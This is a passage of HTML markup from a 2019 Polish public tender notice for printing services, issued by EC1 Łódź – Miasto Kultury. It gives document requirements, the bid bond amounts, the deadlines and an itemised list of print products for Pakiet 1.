WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp (o ile nie można go uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych).</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Treść oferty stanowią następujące dokumenty:1. FORMULARZ OFERTY - wypełniony i podpisany przez osoby upoważnione do reprezentowania Wykonawcy (zgodnie z dokumentem określającym status prawny Wykonawcy lub dołączonym do oferty pełnomocnictwem) (wg zał. nr 2 do SIWZ), składany w oryginale.2. FORMULARZ ASORTYMENTOWO-CENOWY - wypełniony i podpisany przez osoby upoważnione do reprezentowania Wykonawcy (zgodnie z dokumentem określającym status prawny Wykonawcy lub dołączonym do oferty pełnomocnictwem) (wg zał. nr 3 do SIWZ), składany w oryginale.3. Po 1 EGZEMPLARZU PRÓBKI określonej w Załączniku nr 3 do SIWZ:a)	w PAKIECIE 1 w poz. 4 (Wizytówka), poz. 27 (Folder, format netto 848x297mm), b)	w PAKIECIE 2 w poz. 4 (Kanwas);c)	w PAKIECIE 3 (Wydawnictwo zwarte - zgodnie z opisem wskazanym w Rozdziale IX.6.3. SIWZ (Zasady oceny kryterium ,,Jakość") oraz w Załączniku 3 do SIWZ w zakresie Pakietu 3).Każda próbka będzie przedmiotem badania w kryterium ,,Jakość" w kryteriach oceny ofert, określonych w rozdziale IX SIWZ. Wykonawca na żądanie Zamawiającego, potwierdzi autentyczność każdej próbki. Wykonawca zobowiązany jest do załączenia do oferty wypełnionego WYKAZU ZŁOŻONYCH PRÓBEK (wg zał. nr 5 do SIWZ).Ponadto wraz z ofertą, Wykonawca zobowiązany jest złożyć następujące oświadczenia/dokumenty:1. ORYGINAŁ PEŁNOMOCNICTWA lub kopia potwierdzoną za zgodność z oryginałem przez osobę wystawiającą lub przez notariusza, jeżeli osobą podpisującą ofertę nie będzie osoba upoważniona na podstawie dokumentu określającego status prawny Wykonawcy. Dla pełnomocnictwa tego, zgodnie art. 1 ust. 1 pkt 2 ustawy z dnia 16 listopada 2006 r. o opłacie skarbowej (t.jedn. Dz.U. 2018 poz. 1044 ze zm.), nie jest wymagane uiszczenie opłaty.2. DOKUMENT POTWIERDZAJĄCY WNIESIENIE WADIUM - w innej formie niż pieniężna, tj. oryginał gwarancji lub poręczenia. W celu wykazania braku podstaw wykluczenia z postępowania o udzielenie zamówienia z powodu okoliczności, o których mowa w art. 24 ust. 1 pkt 23 ustawy Pzp, Wykonawcy, zgodnie z art. 24 ust. 11 ustawy Pzp, w terminie 3 dni od zamieszczenia na stronie internetowej (Platformie zakupowej) informacji, o której mowa w art. 86 ust. 5 ustawy Pzp, przekazują (bez wezwania) Zamawiającemu:1. OŚWIADCZENIE O PRZYNALEŻNOŚCI ALBO BRAKU PRZYNALEŻNOŚCI DO TEJ SAMEJ GRUPY KAPITAŁOWEJ co Wykonawcy, którzy złożyli oferty w niniejszym postępowaniu albo braku przynależności do jakiejkolwiek grupy kapitałowej, składane w oryginale. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w przedmiotowym postępowaniu o udzielenie zamówienia. Wzór oświadczenia stanowi Załącznik nr 6 do SIWZ.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">Każdy Wykonawca zobowiązany jest zabezpieczyć swoją ofertę wadium w wysokości: PAKIET 1 - wysokość wadium 4 400,00 zł;PAKIET 2 - wysokość wadium 1 300,00 zł;PAKIET 3 - wysokość wadium 3 000,00 zł.Kwota wadium dla całego zamówienia (wszystkich PAKIETÓW) wynosi: 8 700,00 zł.Wadium może być wniesione wyłącznie w formach określonych w art. 45 ust. 6 ustawy Pzp.Wadium powinno być oznaczone w następujący sposób: ,,WADIUM postępowanie numer 080/DA/PN/2019 - PAKIET NR ..."Wadium wniesione w pieniądzu należy przelać na rachunek bankowy Zamawiającego przed upływem terminu składania ofert:Bank: PKO BP S.A Oddział w ŁodziNumer rachunku: 02 1020 3352 0000 1602 0221 0482Wadium wniesione w innej niż pieniądz dopuszczonej formie, należy złożyć w oryginale wraz z ofertą w sposób umożliwiający dokonanie odłączenia i zwrotu oryginału dokumentu bez uszkodzenia oferty (w odrębnej kopercie), a jego kopia w ofercie.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Zakres zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, określają Istotne postanowienia umowy stanowiące Załącznik nr 1a do SIWZ (dla PAKIETU 1), Załącznik nr 1b do SIWZ (dla PAKIETU 2) oraz Załącznik nr 1c do SIWZ (dla PAKIETU 3).</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-04-19</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">12:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6">Od Wykonawcy, którego oferta została wybrana jako najkorzystniejsza i który zostanie zaproszony do podpisania umowy, wymagane będzie wniesienie zabezpieczenia należytego wykonania umowy, w wysokości 10% ceny oferty zawierającej podatek (dla każdego z PAKIETÓW). Zabezpieczenie może być wniesione wyłącznie w formach określonych w art. 148 ust. 1 ustawy Pzp. Zamawiający nie przewiduje wniesienia zabezpieczenia w innych formach określonych w art. 148 ust. 2 ustawy Pzp.OTWARCIE OFERT: 1) miejsce otwarcia ofert: siedziba Zamawiającego: ,,EC1 Łódź - Miasto Kultury" w Łodzi, ul. Targowa 1/3, 90-022 Łódź, Sala konferencyjna,2) termin otwarcia ofert: dnia 19 kwietnia 2019 r. godz. 12:10.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>PAKIET 1 - Usługi poligraficzne</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Nazwa zadania: 1) PAKIET 1 - Usługi poligraficzne Krótki opis przedmiotu zamówienia: Przedmiotem zamówienia jest sukcesywne świadczenie usług poligraficznych.1) PAKIET 1 - Usługi poligraficzne:Lp.	Przedmiot zamówienia	Nakład Ilość nakładów (zamówienie podstawowe)	Ilość nakładów (prawo opcji)1.	Koperty firmowe, format C6	1000	1	2.	Koperty firmowe, format C5	300	1	3.	Koperty firmowe, format C4	100	1	4.	Wizytówki	100	23	55.	Ulotki, format netto 99x210mm	5000	2	6.	Ulotki, format netto 99x210mm	3000	12	7.	Ulotki, format netto 99x210mm	5000	1	8.	Ulotki, format netto A6	1000	10	9.	Ulotki, format netto 189x210mm	1000	6	10.	Ulotki, format netto 210x297mm	5000	4	11.	Ulotki, format netto 210x297mm	1000	2	12.	Ulotki, format netto 210x297mm	5000	12	13.	Ulotki, 4xDL składana do DL	1000	1	14.	Ulotki, format netto A3	25000	1	15.	Plakat, format netto 707x1000mm	1000	1	16.	Plakat, format netto 707x1000mm	100	5	17.	Plakat, format netto 500x707mm	300	1	18.	Plakat, format netto 500x707mm	100	9	19.	Plakat, format netto 500x707mm	30	4	20.	Plakat, format netto 500x707mm	25	10	21.	Plakat, format netto 500x707mm	20	5	522.	Plakat, format netto 500x707mm	10	2	23.	Plakat, format netto 1200x1770mm	40	3	24.	Kalendarz ścienny trójdzielny 200	1	25.	Folder, format netto 848x297mm 2000	2	126.	Folder, format netto 848x297mm	1000	2	227.	Folder, format netto 848x297mm 500	1	28.	Folder, format netto 840x297mm 500	1	29.	Folder, format A5 poziom	2000	2	30.	Komiks promocyjny, format netto 148x210mm	500	1	31.	Zakładki, format netto 35x210mm	1000	20	32.	Karty pocztowe, format 150x100mm	1000	5	33.	Zaproszenia, format netto 99x210mm	250	1	34.	Zaproszenia, format netto 99x210mm	200	1	35.	Zaproszenia, format netto 99x210mm	200	10	36.	Zaproszenia, format netto A6	50	4	37.	Zaproszenia, format netto 188x210mm	500	4	38.	Torba papierowa, wymiary 250x110x320mm	1000	1	39.	Torba papierowa, wymiary 250x110x320mm 1000	1	40.	Informator, format netto A4	7000	1	41.	Notatnik, format A5, karton 300g/m2	1000	4	42.	Zeszyt, format A5	1000	3	43.	Naklejka, 20 mm 120000	4	44.	Naklejka, okrągła, średnica 70mm	5000	1	Na realizację przedmiotu zamówienia składają się następujące etapy:w PAKIECIE 1:a) przygotowanie materiałów do druku (prepress),b) usługi drukowania (press),c) usługi introligatorskie (postpress),d) opakowanie, ubezpieczenie i transport do siedziby Zamawiającego lub innych miejsc przez niego wskazanych, znajdujących się w granicach administracyjnych Miasta Łodzi,Szczegółowy Opis Przedmiotu Zamówienia (SOPZ) dla każdej części/pakietu zawarty zostałw Formularzu asortymentowo-cenowym, stanowiącym Załącznik nr 3 do SIWZ.PRAWO OPCJI:Zamawiający przewiduje możliwość skorzystania z prawa opcji w zakresie świadczenia usług poligraficznych dotyczących następującego asortymentu określonego:w PAKIECIE 1:- w poz. 4 (Wizytówki) w ilości 5 nakładów,- w poz. 21 (Plakat, format netto 500x707mm) w ilości 5 nakładów,- w poz. 25 (Folder, format netto 848x297mm) w ilości 1 nakładu,- w poz. 26 (Folder, format netto 848x297mm) w ilości 2 nakładów,o parametrach takich samych jak wskazane w Załączniku nr 3 do SIWZ (Formularz asortymentowo-cenowy). Zamawiający, w ramach prawa opcji, może nabyć pełną ilość nakładu asortymentu lub tylko część. Szczegółowe warunki realizacji prawa opcji zostały uregulowanew ISTOTNYCH POSTANOWIENIACH UMOWY, stanowiących odpowiednio Załącznik nr 1a do SIWZ (dla PAKIETU 1). Zamawiający zastrzega, iż może skorzystać z prawa opcji do końca obowiązywania umowy zawartej w wyniku przeprowadzonego postępowania.RÓWNOWAŻNOŚĆ:Wobec wszelkich wskazanych i wymaganych w SIWZ norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów referencyjnych oraz certyfikatów, Zamawiający dopuszcza rozwiązania równoważne. Podane przez Zamawiającego nazwy, znaki towarowe mają charakter przykładowy, a ich wskazanie ma na celu określenie oczekiwanego standardu. Zamawiający dopuszcza składanie ofert równoważnych. Za ,,produkt równoważny", Zamawiający będzie uznawał produkt o nie gorszych parametrach technicznych, niż wskazane w opisie przedmiotu zamówienia.ZATRUDNIENIE NA PODSTAWIE UMOWY O PRACĘ:Zamawiający, mając na uwadze treść art. 29 ust. 3a ustawy Pzp, wymaga zatrudnienia przez Wykonawcę lub podwykonawcę, na podstawie umowy o pracę - w rozumieniu przepisów art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. Kodeks pracy (t.jedn.: Dz.U. z 2018 r., poz. 917 ze zm.), osób wykonujących następujące czynności w zakresie realizacji zamówienia:w PAKIECIE 1:a) usługi CTP,b) usługi drukarskie,c) usługi introligatorskie.Zasady dokumentowania zatrudnienia przez Wykonawcę osób na umowę o pracę oraz kontroli wykonania przedmiotowego obowiązku i sankcji z tytułu ich nieprzestrzegania, zostały określone w § 4 i § 7 Istotnych postanowień umowy stanowiących Załącznik nr 1a do SIWZ.GWARANCJA:Wykonawca zobowiązany będzie udzielić gwarancji jakości i rękojmi za wady na okres minimum 24 miesięcy na wykonane i dostarczone materiały informacyjno-promocyjne w zakresie PAKIETU 1.Okres gwarancji liczy się od daty podpisania właściwego protokołu zdawczo-odbiorczego.ISTOTNE POSTANOWIENIA UMOWYSzczegółowe warunki realizacji zamówienia określają: ,,ISTOTNE POSTANOWIENIA UMOWY" stanowiące Załącznik nr 1a do SIWZ (dla PAKIETU 1).<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>79823000-9, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: 